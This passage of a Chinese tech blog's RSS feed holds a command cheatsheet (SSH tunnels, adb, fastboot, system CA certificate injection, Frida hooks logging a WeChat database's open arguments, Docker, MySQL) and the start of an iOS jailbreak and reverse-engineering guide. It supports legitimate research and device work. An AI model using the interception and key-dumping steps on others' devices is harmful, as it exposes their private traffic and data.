</content:encoded></item><item><title>cheatsheet</title><link>https://picoorg.github.io/posts/cheatsheet/</link><guid isPermaLink="true">https://picoorg.github.io/posts/cheatsheet/</guid><description>CheatSheet，快速检索常见Tips。</description><pubDate>Sat, 11 May 2024 00:00:00 GMT</pubDate><content:encoded>&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#1-%E4%BB%A3%E7%90%86&quot;&gt;1. 代理&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#11-ssh&quot;&gt;1.1. ssh&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#2-android&quot;&gt;2. Android&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#21-adb&quot;&gt;2.1. adb&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#22-fastboot&quot;&gt;2.2. fastboot&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#23-%E9%80%86%E5%90%91&quot;&gt;2.3. 逆向&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#24-%E7%B3%BB%E7%BB%9F%E8%AF%81%E4%B9%A6&quot;&gt;2.4. 系统证书&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#25-pixel%E5%88%B7%E6%9C%BA&quot;&gt;2.5. pixel刷机&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#251-%E5%8F%8C%E6%B8%85%E5%9B%9B%E6%B8%85%E5%85%AD%E6%B8%85&quot;&gt;2.5.1. 双清/四清/六清&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#252-%E5%8D%A1%E5%88%B7&quot;&gt;2.5.2. 卡刷&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#253-%E7%BA%BF%E5%88%B7&quot;&gt;2.5.3. 线刷&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#3-frida&quot;&gt;3. Frida&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#31-%E5%A0%86%E6%A0%88%E6%89%93%E5%8D%B0&quot;&gt;3.1. 堆栈打印&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#4-windows&quot;&gt;4. Windows&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#41-hyper-v&quot;&gt;4.1. hyper-v&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#5-%E8%AF%81%E4%B9%A6&quot;&gt;5. 证书&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#51-openssl&quot;&gt;5.1. openssl&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#6-docker&quot;&gt;6. Docker&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#61-docker-desktop-version-on-mac&quot;&gt;6.1. Docker Desktop version on Mac&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#7-linux&quot;&gt;7. Linux&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#71-%E6%89%A9%E5%AE%B9&quot;&gt;7.1. 扩容&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#72-%E8%87%AA%E5%8A%A8%E6%8C%82%E8%BD%BD&quot;&gt;7.2. 自动挂载&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#73-%E5%91%BD%E4%BB%A4%E8%A1%8C%E6%93%8D%E4%BD%9C&quot;&gt;7.3. 命令行操作&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#8-mysql&quot;&gt;8. Mysql&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#9-nodejs&quot;&gt;9. NodeJS&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#91-elecetron-%E5%8F%8D%E7%BC%96%E8%AF%91&quot;&gt;9.1. elecetron 反编译&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#10-%E7%BC%96%E8%AF%91&quot;&gt;10. 编译&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#11-%E5%8F%82%E8%80%83%E6%96%87%E7%8C%AE&quot;&gt;11. 参考文献&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;1. 代理&lt;/h1&gt;
&lt;h2&gt;1.1. ssh&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;socks5 走 ssh 隧道实现代理&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;./ssh_socks5_proxy_linux.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# -D：指定本地监听IP和端口
# -q：静默模式
# -C：压缩节约带宽
# -N：不执行远端命令，仅转发流量
# -f：在后台运行
# user@remote：远程用户@远程主机
ssh -D 0.0.0.0:1337 -q -C -N -f user@remote
&lt;/code&gt;&lt;/pre&gt;
&lt;ol&gt;
&lt;li&gt;其他&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;# 本地端口转发 ssh -LNf local-port:target-host:target-port tunnel-host
# -L：转发本地端口。
# -N：不发送任何命令，只用来建立连接。没有这个参数，会在 SSH 服务器打开一个 Shell。
# -f：将 SSH 连接放到后台。没有这个参数，暂时不用 SSH 连接时，终端会失去响应。
ssh -L 3306:192.168.31.194:3306 root@127.0.0.1

# 远程端口转发 ssh -R target-port:local-host:local-port tunnel-host
# -R：转发远程端口。
ssh -R 9999:192.168.2.3:9999 root@1.1.1.1

# 通过~/.ssh/config配置github代理
#Host github.com
#    HostName github.com
#    ProxyCommand nc -v -X connect -x 127.0.0.1:9999 %h %p
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;2. Android&lt;/h1&gt;
&lt;h2&gt;2.1. adb&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;adb reboot bootloader              # 进入fastboot
adb shell am start -a android.intent.action.VIEW -d scheme:// # 访问指定url
adb shell settings put global http_proxy 127.0.0.1:9999 # 设置代理
adb shell settings put global http_proxy :0 # 取消代理
adb shell setenforce 0 # 关闭SELinux
adb shell setprop persist.device_config.runtime_native.usap_pool_enabled false # 关闭usap
adb shell settings put system screen_off_timeout 100000000 # 设置屏幕常亮
adb shell settings put global ntp_server pool.ntp.org # pixel内置ntp被墙，设置同步时间服务器
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;2.2. fastboot&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;fastboot reboot                    # 重启
fastboot boot boot.img             # 临时进入boot镜像
fastboot flash boot boot.img       # 刷入boot镜像
fastboot -w                        # 清除userdata，metadata
fastboot update &amp;lt;image.zip&amp;gt;        # 刷入zip包
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;2.3. 逆向&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;Android Backup 包&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;java -jar abe.jar unpack cat.ab cat.tar # Android Backup包转换
&lt;/code&gt;&lt;/pre&gt;
&lt;ol&gt;
&lt;li&gt;jadx&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;jadx-gui --show-bad-codes  # jadx无损启动
&lt;/code&gt;&lt;/pre&gt;
&lt;ol&gt;
&lt;li&gt;Xamarin 逆向&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;import sys, struct, lz4.block, os.path

def main():
	if len(sys.argv) != 2:
		sys.exit(&quot;[i] Usage: &quot; + sys.argv[0]  + &quot; in_file.dll&quot;)

	in_file = sys.argv[1]

	with open(in_file, &quot;rb&quot;) as compressed_file:
		compressed_data = compressed_file.read()

	header = compressed_data[:4]

	if header != b&apos;XALZ&apos;:
		sys.exit(&quot;[!] Wrong header, aborting...!&quot;)

	packed_payload_len = compressed_data[8:12]
	unpacked_payload_len = struct.unpack(&apos;&amp;lt;I&apos;, packed_payload_len)[0]
	compressed_payload = compressed_data[12:]
	decompressed_payload = lz4.block.decompress(compressed_payload, uncompressed_size=unpacked_payload_len)

	out_file = in_file.rsplit(&quot;.&quot;,1)[0] + &quot;_out.dll&quot;

	if os.path.isfile(out_file):
		sys.exit(&quot;[!] Output file [&quot; + out_file  + &quot;] already exists, aborting...!&quot;)

	with open(out_file, &quot;wb&quot;) as decompressed_file:
		decompressed_file.write(decompressed_payload)
		print( &quot;[i] Success!&quot;)
		print( &quot;[i] File [&quot; + out_file + &quot;] was created as result!&quot;)

if __name__ == &quot;__main__&quot;:
	main()
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;2.4. 系统证书&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;# 计算证书pem格式的hash，假设输出为9a5ba575
openssl x509 -subject_old_hash -in a.pem
# mac
# openssl x509 -subject_hash_old -in a.pem
# 重命名&amp;lt;hash&amp;gt;.0
mv a.pem 9a5ba575.0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Android &amp;lt;= 13&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Create a separate temp directory, to hold the current certificates
# Without this, when we add the mount we can&apos;t read the current certs anymore.
mkdir -m 700 /data/local/tmp/htk-ca-copy

# Copy out the existing certificates
cp /system/etc/security/cacerts/* /data/local/tmp/htk-ca-copy/

# Create the in-memory mount on top of the system certs folder
mount -t tmpfs tmpfs /system/etc/security/cacerts

# Copy the existing certs back into the tmpfs mount, so we keep trusting them
mv /data/local/tmp/htk-ca-copy/* /system/etc/security/cacerts/

# Copy our new cert in, so we trust that too
cp /data/local/tmp/9a5ba575.0  /system/etc/security/cacerts/

# Update the perms &amp;amp; selinux context labels, so everything is as readable as before
chown root:root /system/etc/security/cacerts/*
chmod 644 /system/etc/security/cacerts/*
chcon u:object_r:system_file:s0 /system/etc/security/cacerts/*

# Delete the temp cert directory &amp;amp; this script itself
rm -r /data/local/tmp/htk-ca-copy
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Android &amp;gt;= 14，由于安卓14在证书的路径有变化，参考&lt;a href=&quot;https://weibo.com/3322982490/Ni21tFiR9&quot;&gt;wuxianlin的微博&lt;/a&gt;，新路径在&lt;code&gt;/apex/com.android.conscrypt/cacerts&lt;/code&gt;，需要增加&lt;code&gt;mount -o bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;或者直接使用现有&lt;a href=&quot;https://github.com/ys1231/MoveCertificate&quot;&gt;模块&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;2.5. pixel刷机&lt;/h2&gt;
&lt;p&gt;tips:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;网友建议刷机前四清，防止意外阻止刷机&lt;/li&gt;
&lt;li&gt;线刷相当于底层替换所有镜像，数据不会保留；卡刷相当于更新系统，数据会保留。（个人理解起名卡刷是因为该模式可以选择&lt;code&gt;Apply update from SD card&lt;/code&gt;）&lt;/li&gt;
&lt;li&gt;降级可以按照线刷的步骤，根据&lt;code&gt;flash-all&lt;/code&gt;脚本，逐步降级&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;2.5.1. 双清/四清/六清&lt;/h3&gt;
&lt;p&gt;★★普通双清★★
普通双清就是在recovery模式下选择：&lt;/p&gt;
&lt;p&gt;1：清除数据恢复出厂（wipe data/factory reset）
备注：清除/data(程序数据)和/cache(系统缓存)两个分区（清除用户信息和软件信息），在常用的CWM里（如CWM-based Recovery v6.0.5.0），还包括格式化/sd-ext和/sdcard/.android_secure这两个分区；&lt;/p&gt;
&lt;p&gt;2：清除cache分区（wipe cache partition）
说明：仅格式化/cache这一个分区(清除系统缓存)，只是用在刷完系统后出现问题，恢复还原用的！&lt;/p&gt;
&lt;p&gt;★★四清解释★★
所谓刷机四清就是在双清的基础上，增加下面两项：&lt;/p&gt;
&lt;p&gt;3：Wipe dalvik cache （清除缓存）
说明：高级功能 -&amp;gt; 清除dalvik cache
备注：安卓系统启动时，需要建立一个所有程序的信任分支，以优化缓存文件，以加快启动速度。wipe或者新刷系统后，初次启动很慢，就是因为没有建立这个文件，以后启动就会加快。&lt;/p&gt;
&lt;p&gt;4：格式化 / system（格式化系统分区）
说明：挂载和大容量存储 -&amp;gt; 格式化 / system&lt;/p&gt;
&lt;p&gt;★★六清解释★★
所谓刷机六清就是在上面四清的基础上，增加下面两项：&lt;/p&gt;
&lt;p&gt;5：格式化 / sdcard（格式化手机内置存储卡）
说明：挂载和大容量存储 -&amp;gt; 格式化 / sdcard&lt;/p&gt;
&lt;p&gt;6：格式化 / storage / extsdcard（格式化手机外置TF卡）&lt;/p&gt;
&lt;h3&gt;2.5.2. 卡刷&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;在&lt;code&gt;Google&lt;/code&gt;&lt;a href=&quot;https://developers.google.com/android/ota&quot;&gt;页面&lt;/a&gt;拉到底部点击&lt;code&gt;Acknowledge&lt;/code&gt;出现下载列表，下载对应型号镜像&lt;/li&gt;
&lt;li&gt;执行&lt;code&gt;adb reboot recovery&lt;/code&gt;进入&lt;code&gt;Recovery&lt;/code&gt;模式&lt;/li&gt;
&lt;li&gt;进入&lt;code&gt;Recovery&lt;/code&gt;模式显示&lt;code&gt;no command&lt;/code&gt;后，按住&lt;code&gt;power&lt;/code&gt;键然后按一下&lt;code&gt;volume up&lt;/code&gt;键进入选项菜单选择&lt;code&gt;Apply update from ADB&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;执行&lt;code&gt;adb sideload &amp;lt;ota file&amp;gt;&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;2.5.3. 线刷&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;在&lt;code&gt;Google&lt;/code&gt;&lt;a href=&quot;https://developers.google.com/android/images&quot;&gt;页面&lt;/a&gt;拉到底部点击&lt;code&gt;Acknowledge&lt;/code&gt;出现下载列表，下载对应型号镜像&lt;/li&gt;
&lt;li&gt;使用&lt;code&gt;unzip&lt;/code&gt;解压下载的文件&lt;/li&gt;
&lt;li&gt;执行&lt;code&gt;flash-all.sh&lt;/code&gt;或&lt;code&gt;flash-all.bat&lt;/code&gt;脚本&lt;/li&gt;
&lt;/ol&gt;
&lt;h1&gt;3. Frida&lt;/h1&gt;
&lt;h2&gt;3.1. 堆栈打印&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;Java.perform(function () {
  var SQLiteDatabase = Java.use(&quot;com.tencent.wcdb.database.SQLiteDatabase&quot;);
  SQLiteDatabase[&quot;open&quot;].implementation = function (
    bArr,
    sQLiteCipherSpec,
    i15
  ) {
    console.log(
      Java.use(&quot;android.util.Log&quot;).getStackTraceString(
        Java.use(&quot;java.lang.Throwable&quot;).$new()
      )
    ); //java层打印堆栈
    console.log(
      &quot;open is called&quot; +
        &quot;, &quot; +
        &quot;bArr: &quot; +
        JSON.stringify(bArr) +
        &quot;, &quot; +
        &quot;sQLiteCipherSpec: &quot; +
        sQLiteCipherSpec +
        &quot;, &quot; +
        &quot;i15: &quot; +
        i15
    );
    var ret = this.open(bArr, sQLiteCipherSpec, i15);
    console.log(&quot;open ret value is &quot; + ret);
    return ret;
  };
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;3.2 函数 hook&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Java.perform(function () {
  var e = Java.use(&quot;ir3.e&quot;);
  e[&quot;r&quot;].implementation = function (str, str2, i15, z15) {
    console.log(
      &quot;r is called&quot; +
        &quot;, &quot; +
        &quot;str: &quot; +
        str +
        &quot;, &quot; +
        &quot;str2: &quot; +
        str2 +
        &quot;, &quot; +
        &quot;i15: &quot; +
        i15 +
        &quot;, &quot; +
        &quot;z15: &quot; +
        z15
    );
    var ret = this.r(str, str2, i15, z15);
    console.log(&quot;r ret value is &quot; + ret);
    return ret;
  };
});
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;4. Windows&lt;/h1&gt;
&lt;h2&gt;4.1. hyper-v&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All # 开启hyper-v
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;5. 证书&lt;/h1&gt;
&lt;h2&gt;5.1. openssl&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;ssh-keygen -y -f ~/.ssh/id_rsa # ssh-keygen导出公钥
openssl x509 -in a.cer -inform der -out a.pem -outform pem # der to pem
# 自签名服务器证书
openssl genrsa -out server.key 2048 # 生成一个私钥文件
openssl req -new -key server.key -out server.csr # 通用名称 (CN)需要填域名*.example.com
openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt # 生成自签名证书
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;6. Docker&lt;/h1&gt;
&lt;h2&gt;6.1. Docker Desktop version on Mac&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;# https://stackoverflow.com/questions/64221861/an-error-failed-to-solve-with-frontend-dockerfile-v0
export DOCKER_BUILDKIT=0
export COMPOSE_DOCKER_CLI_BUILD=0

# snap docker 国内源
# /var/snap/docker/current/config/daemon.json
# {
#     &quot;log-level&quot;:        &quot;error&quot;,
#     &quot;registry-mirrors&quot;: [
#         &quot;https://docker.mirrors.ustc.edu.cn&quot;
#     ]
# }
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;7. Linux&lt;/h1&gt;
&lt;h2&gt;7.1. 扩容&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;# lvextend -L 10G /dev/mapper/ubuntu--vg-ubuntu--lv         //增大或减小至19G
# lvextend -L +10G /dev/mapper/ubuntu--vg-ubuntu--lv        //增加10G
# lvreduce -L -10G /dev/mapper/ubuntu--vg-ubuntu--lv        //减小10G
# lvresize -l +100%FREE /dev/mapper/ubuntu--vg-ubuntu--lv   //按百分比扩
sudo lvresize -l +100%FREE /dev/mapper/ubuntu--vg-ubuntu--lv
# 执行resize2fs使扩容生效
sudo resize2fs /dev/mapper/ubuntu--vg-ubuntu--lv
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;7.2. 自动挂载&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;crontab -e
# @reboot mount /dev/sdb /home/docker/data
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;7.3. 命令行操作&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;for i in *; do mv $i ${i}.zip; done # 批量加后缀
for i in *; do mv $i ${i%.*}.zip; done # 批量改后缀
SCRIPT_DIR=$( dirname $(readlink -f $0) ) # 当前目录
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;8. Mysql&lt;/h1&gt;
&lt;pre&gt;&lt;code&gt;# 创建账号及修改账号权限
CREATE DATABASE bizsec CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci;
CREATE USER &apos;bizsec&apos;@&apos;%&apos; IDENTIFIED BY &apos;password&apos;;
GRANT ALL PRIVILEGES ON bizsec.* TO &apos;bizsec&apos;@&apos;%&apos;;
FLUSH PRIVILEGES;
SELECT User, Password, Host FROM mysql.user;
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;9. NodeJS&lt;/h1&gt;
&lt;pre&gt;&lt;code&gt;npm config set registry http://mirrors.cloud.tencent.com/npm/ # 配置
npm config get registry # 验证
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;9.1. elecetron 反编译&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;# https://stackoverflow.com/questions/38523617/how-to-unpack-an-asar-file
npm install -g @electron/asar
npx @electron/asar extract app.asar app # Extract the whole archive:
npx @electron/asar extract-file app.asar main.js #Extract a particular file:
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;10. 编译&lt;/h1&gt;
&lt;pre&gt;&lt;code&gt;clang -o my_program my_program.c -Wl,--verbose # 打印出详细的链接过程，包括使用的库。
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;11. 参考文献&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://ma.ttias.be/socks-proxy-linux-ssh-bypass-content-filters/#set-up-socks5-ssh-tunnel&quot;&gt;Create a SOCKS proxy on a Linux server with SSH to bypass content filters&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://bbs.oneplus.com/thread/2743808&quot;&gt;详细解释双清/四清/六清&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>iOS逆向指路</title><link>https://picoorg.github.io/posts/ios%E9%80%86%E5%90%91%E6%8C%87%E8%B7%AF/</link><guid isPermaLink="true">https://picoorg.github.io/posts/ios%E9%80%86%E5%90%91%E6%8C%87%E8%B7%AF/</guid><description>iOS逆向过程比较基础的内容，方便快速查找各阶段所用到的知识。</description><pubDate>Wed, 11 Sep 2024 00:00:00 GMT</pubDate><content:encoded>&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#1-%E8%B6%8A%E7%8B%B1&quot;&gt;1. 越狱&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#11-palera1n&quot;&gt;1.1. palera1n&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#12-checkra1n&quot;&gt;1.2. Checkra1n&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#2-%E7%A0%B8%E5%A3%B3&quot;&gt;2. 砸壳&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#21-frida-ios-dump&quot;&gt;2.1. frida-ios-dump&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#3-%E5%A4%B4%E6%96%87%E4%BB%B6%E5%AF%BC%E5%87%BA&quot;&gt;3. 头文件导出&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#4-hook-%E5%8F%8A%E5%8A%A8%E6%80%81%E5%BA%93%E6%B3%A8%E5%85%A5&quot;&gt;4. HOOK 及动态库注入&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#41-theos-%E7%BC%96%E8%AF%91%E5%B7%A5%E5%85%B7%E5%8F%8A-tweak&quot;&gt;4.1. theos 编译工具及 tweak&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#411-tweak-%E5%AE%89%E8%A3%85%E7%8E%AF%E5%A2%83%E5%8F%8A%E7%BC%96%E8%AF%91%E8%BF%87%E7%A8%8B&quot;&gt;4.1.1. tweak 安装环境及编译过程&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#412-tweak-%E4%BB%A3%E7%A0%81%E7%BC%96%E5%86%99%E5%8F%8A-logos&quot;&gt;4.1.2. tweak 代码编写及 Logos&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#5-%E6%89%93%E5%8C%85%E9%87%8D%E7%AD%BE%E5%90%8D%E5%AE%89%E8%A3%85&quot;&gt;5. 打包、重签名、安装&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#51-monkeydev-%E6%89%93%E5%8C%85&quot;&gt;5.1. MonkeyDev 打包&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#511-%E5%AE%89%E8%A3%85%E4%B8%8E%E5%8D%B8%E8%BD%BD&quot;&gt;5.1.1. 安装与卸载&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#512-monkeydev-%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE&quot;&gt;5.1.2. MonkeyDev 环境配置&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#513-%E5%88%9B%E5%BB%BA%E5%B7%A5%E7%A8%8B&quot;&gt;5.1.3. 创建工程&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#52-ios-app-signer-%E9%87%8D%E7%AD%BE%E5%90%8D&quot;&gt;5.2. iOS APP Signer 重签名&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#53-%E5%AE%89%E8%A3%85&quot;&gt;5.3. 安装&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#6-%E5%8F%82%E8%80%83%E6%96%87%E7%8C%AE&quot;&gt;6. 参考文献&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;1. 越狱&lt;/h2&gt;
&lt;h3&gt;1.1. palera1n&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://palera.in/&quot;&gt;palera1n&lt;/a&gt;的核心是利用&lt;code&gt;checkm8&lt;/code&gt;漏洞，这是一个影响从&lt;code&gt;A8&lt;/code&gt;到&lt;code&gt;A11&lt;/code&gt;芯片的低级别硬件漏洞，允许不受限制的访问设备的&lt;code&gt;BootROM&lt;/code&gt;。项目中的&lt;code&gt;loader&lt;/code&gt;应用负责引导越狱过程，而&lt;code&gt;jbinit&lt;/code&gt;则在系统内核层面进行操作，确保越狱的持久性和可靠性。定制的&lt;code&gt;PongoOS&lt;/code&gt;是一个特别设计的操作系统层，用于增强越狱后的设备功能和性能。&lt;code&gt;palera1n&lt;/code&gt;越狱支持&lt;code&gt;A8-A11&lt;/code&gt;设备，注意&lt;code&gt;iOS16&lt;/code&gt;以上需重置设备。完整列表如下：&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;iPhone(s)&lt;/th&gt;
&lt;th&gt;iPad(s)&lt;/th&gt;
&lt;th&gt;iPod(s)&lt;/th&gt;
&lt;th&gt;Apple TV(s)&lt;/th&gt;
&lt;th&gt;Apple T2&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;iPhone 6s&lt;/td&gt;
&lt;td&gt;iPad mini 4&lt;/td&gt;
&lt;td&gt;iPod Touch (7th generation)&lt;/td&gt;
&lt;td&gt;Apple TV HD&lt;/td&gt;
&lt;td&gt;Apple T2 iMac20,1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;iPhone 6s Plus&lt;/td&gt;
&lt;td&gt;iPad (5th generation)&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Apple TV 4K (1st generation)&lt;/td&gt;
&lt;td&gt;Apple T2 iMac20,2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;iPhone SE (2016)&lt;/td&gt;
&lt;td&gt;iPad (6th generation)&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Apple T2 MacBookAir8,1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;iPhone 7&lt;/td&gt;
&lt;td&gt;iPad (7th generation)&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Apple T2 MacBookAir8,2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;iPhone 7 Plus&lt;/td&gt;
&lt;td&gt;iPad Pro (9.7&quot;)&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Apple T2 MacBookAir9,1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;iPhone 8&lt;/td&gt;
&lt;td&gt;iPad Pro (12.9&quot;) (1st generation)&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Apple T2 MacBookPro15,1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;iPhone 8 Plus&lt;/td&gt;
&lt;td&gt;iPad Pro (10.5&quot;)&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Apple T2 MacBookPro15,2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;iPhone X&lt;/td&gt;
&lt;td&gt;iPad Pro (12.9&quot;) (2nd generation)&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Apple T2 MacBookPro15,3&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;iPad Air 2&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Apple T2 MacBookPro15,4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
